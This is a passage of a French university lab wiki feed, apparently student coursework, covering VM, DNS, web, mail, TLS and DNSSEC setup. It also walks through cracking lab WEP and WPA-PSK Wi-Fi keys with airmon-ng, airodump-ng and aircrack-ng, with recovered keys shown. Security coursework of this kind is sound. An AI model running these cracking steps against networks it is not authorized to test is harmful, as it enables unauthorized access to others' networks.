    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35661</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35661"/>
				<updated>2016-12-06T11:14:42Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Récapitulatif des IP &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
